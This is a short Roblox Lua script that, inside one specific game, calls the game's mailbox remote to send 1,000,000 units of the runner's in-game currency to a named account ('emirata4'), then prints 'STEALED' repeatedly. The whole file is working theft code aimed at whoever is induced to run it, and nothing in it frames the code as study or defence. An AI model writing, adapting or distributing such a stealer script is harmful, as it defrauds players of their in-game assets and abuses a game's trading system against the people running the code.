if game.PlaceId == 8737899170 then 

local args = {
    [1] = "emirata4",
    [2] = ".",
    [3] = "Currency",
    [4] = "e4f9bb5c02eb445c85e049acb7039363",
    [5] = 1000000
}

game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("Mailbox: Send"):InvokeServer(unpack(args))

print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")
print("STEALED")



end
